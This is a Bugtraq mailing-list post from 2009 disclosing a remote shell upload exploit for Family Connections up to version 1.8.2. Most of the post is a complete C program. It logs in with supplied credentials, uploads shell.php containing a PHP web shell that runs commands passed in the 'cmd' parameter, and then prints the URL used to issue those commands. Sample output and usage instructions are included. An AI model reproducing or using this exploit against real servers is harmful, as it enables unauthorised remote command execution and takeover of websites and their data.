Family Connections <= 1.8.2 - Remote Shell Upload Exploit

To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
Subject: Family Connections <= 1.8.2 - Remote Shell Upload Exploit
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
Date: Fri, 3 Apr 2009 18:13:15 +0200
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=fBQ9ge5nXdlCYXYAmCEYHf2/ejrZ9l9Yg9rLU30V4j0=; b=RT834e1RGXbJRwGnzXFKXJuDVB3qIftdonRMMTUbocg8ZIxleg0agnxjqJ/Y87s1YH O+1RNgD+1JPtjv1lrRBIRM6EdyMmaM03la8/ZYbctT4CStyImPozUVcwDYwOwq98rZTz 6UVXIyVZcqrK7sNQxAVMdACG815hCAWLwYfM0=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=WN3J60npJj7r+pmkae4ar8PyclxMbF4X9cbwg1fWa1taHtFvCRfIJGS1NydUsRCtC6 gevCPiRQSuBRmgYkUI5aPXkVOeyZj04xG4Lgj8GFbG8cxPkBT7m+ngLWZuepeeUpxhvc k3bbJ7H2E5UhkB55GU/nqe5CbDAaYSNH5c7TI=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

/*

        Family Connections <= 1.8.2 - Remote Shell Upload Exploit
        
        Author: Salvatore "drosophila" Fresta
        
        Contact: drosophilaxxx@xxxxxxxxx
        
        Date: 3 April 2009

        The following software will upload a simple php shell.
        To execute remote commands, you must open the file
        using a browser.
        
        gcc rsue.c -o rsue
        
        ./rsue localhost /fcms/ user password

        [*] Connecting...
        [+] Connected
        [*] Send login...
        [+] Login Successful
        [+] Uploading...
        [+] Shell uploaded
        [+] Connection closed
        
        Open your browser and go to
http://localhost/fcms/gallery/documents/shell.php?cmd=[commands]

*/      

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

int socket_connect(char *server, int port) {

        int fd;
        struct sockaddr_in sock;
        struct hostent *host;
        
        memset(&sock, 0, sizeof(sock));
        
        if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
        
        sock.sin_family = AF_INET;
        sock.sin_port = htons(port);
        
        if(!(host=gethostbyname(server))) return -1;
        
        sock.sin_addr = *((struct in_addr *)host->h_addr);
        
        if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
        
        return fd;

}

int socket_send(int socket, char *buffer, size_t size) {
        
        if(socket < 0) return -1;

        return write(socket, buffer, size) < 0 ? -1 : 0;
        
}

char *socket_receive(int socket, int tout) {

        fd_set input;
        int ret, byte;
        char *buffer, *tmp;
        struct timeval timeout;
        
        FD_ZERO(&input);
        FD_SET(socket, &input);
        
        if(tout > 0) {
                        timeout.tv_sec  = tout;
                        timeout.tv_usec = 0;
        }
        
        if(socket < 0) return NULL;
        
        if(!(buffer = (char *) calloc (0, sizeof (char)))) return NULL;
        
        while (1) {
        
                if(tout > 0)
                        ret = select(socket + 1, &input, NULL, NULL, &timeout);
        else
                        ret = select(socket + 1, &input, NULL, NULL, NULL);
        
        if (!ret) break;
        if (ret < 0) return NULL;
        
        if(!(tmp = (char *) calloc (1024, sizeof (char)))) return NULL;
        
        if ((byte=read(socket, tmp, 1024)) < 0) return NULL;
        
                if(!byte) break;
        
        if(!(buffer = (char *) realloc(buffer, strlen (buffer) + strlen
(tmp)))) return NULL;
        
        strncat(buffer, tmp, strlen(buffer)+strlen(tmp));
        
        }
        
        return buffer;

}

void usage(char *bn) {

        printf("\nFamily Connections <= 1.8.2 - Remote Shell Upload Exploit\n"
                        "Author: Salvatore \"drosophila\" Fresta\n\n"
                        "usage: %s <server> <path> <username> <password>\n"
                        "example: %s localhost /fcms/ admin 123456\n\n", bn, 
bn);       

}

int main(int argc, char *argv[]) {
        
        int sd;
        char code[] = "--AaB03x\r\n"
                                        "Content-Disposition: form-data; 
name=\"doc\"; filename=\"shell.php\"\r\n"
                                        "Content-Type: text/plain\r\n"
                                        "\r\n"
                                        "<?php echo \"<pre>\"; 
system($_GET['cmd']); echo \"</pre>\"?>\r\n"
                                        "--AaB03x\r\n"
                                        "Content-Disposition: form-data; 
name=\"desc\"\r\n"
                                        "\r\n"
                                        "description\r\n"
                                        "--AaB03x\r\n"
                                        "Content-Disposition: form-data; 
name=\"submitadd\"\r\n"
                                        "\r\n"
                                        "Submit\r\n"
                                        "--AaB03x--\r\n",
                *buffer = NULL,
                *rec = NULL,
                *session = NULL;
                
        if(argc < 5) {
                usage(argv[0]);
                return -1;
        }
        
        if(!(buffer = (char
*)calloc(200+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3])+strlen(argv[4]),
sizeof(char)))) {
                perror("calloc");
                return -1;
        }
        
        sprintf(buffer, "POST %sindex.php HTTP/1.1\r\n"
                                        "Host: %s\r\n"
                                        "Content-Type: 
application/x-www-form-urlencoded\r\n"
                                        "Content-Length: 
%d\r\n\r\nuser=%s&pass=%s&submit=Login",
argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3],
argv[4]);
        
                                        
        printf("\n[*] Connecting...");
        
        if((sd = socket_connect(argv[1], 80)) < 0) {
                printf("[-] Connection failed!\n\n");
                free(buffer);
                return -1;
        }
        
        printf("\n[+] Connected"
                        "\n[*] Send login...");
        
        if(socket_send(sd, buffer, strlen(buffer)) < 0) {
                printf("[-] Sending failed!\n\n");
                free(buffer);
                close(sd);
                return -1;
        }
        
        if(!(rec = socket_receive(sd, 0))) {
                printf("[-] Receive failed!\n\n");
                free(buffer);
                close(sd);
                return -1;
        }
        
        if(!strstr(rec, "Login Successful")) {
                printf("\n[-] Login Incorrect!\n\n");
                free(buffer);
                close(sd);
                return -1;
        }
        
        session = strstr(rec, "PHPSESSID");
        session = strtok(session, ";");
        
        if((sd = socket_connect(argv[1], 80)) < 0) {
                printf("[-] Connection failed!\n\n");
                free(buffer);
                return -1;
        }
        
        printf("\n[+] Login Successful"
                        "\n[+] Uploading...");
        
        sprintf(buffer, "POST %sdocuments.php HTTP/1.1\r\n"
                                        "Host: %s\r\n"
                                        "Cookie: %s\r\n"
                                        "Content-type: multipart/form-data, 
boundary=AaB03x\r\n"
                                        "Content-Length: %d\r\n\r\n%s", 
argv[2], argv[1], session,
strlen(code), code);
        
        if(socket_send(sd, buffer, strlen(buffer)) < 0) {
                printf("[-] Sending failed!\n\n");
                free(buffer);
                close(sd);
                return -1;
        }
        
        if(!(rec = socket_receive(sd, 0))) {
                printf("[-] Receive failed!\n\n");
                free(buffer);
                close(sd);
                return -1;
        }
        
        if(!strstr(rec, "Uploaded Successfully")) {
                printf("\n[-] Upload failed!\n\n");
                free(buffer);
                close(sd);
                return -1;
        }
        
        free(buffer);
        close(sd);
        
        printf("\n[+] Shell uploaded"
                        "\n[+] Connection closed\n\n"
                        "Open your browser and go to
http://%s%sgallery/documents/shell.php?cmd=[commands]\n\n";, argv[1],
argv[2]);
        
        return 0;
        
}

-- 
Salvatore "drosophila" Fresta
CWNP444351

Attachment: rsue.c
Description: Binary data

Prev by Date: Family Connections 1.8.2 Arbitrary File Upload
Next by Date: IBM DB2
Previous by thread: Family Connections 1.8.2 Arbitrary File Upload
Next by thread: IBM DB2
Index(es):
- Date
- Thread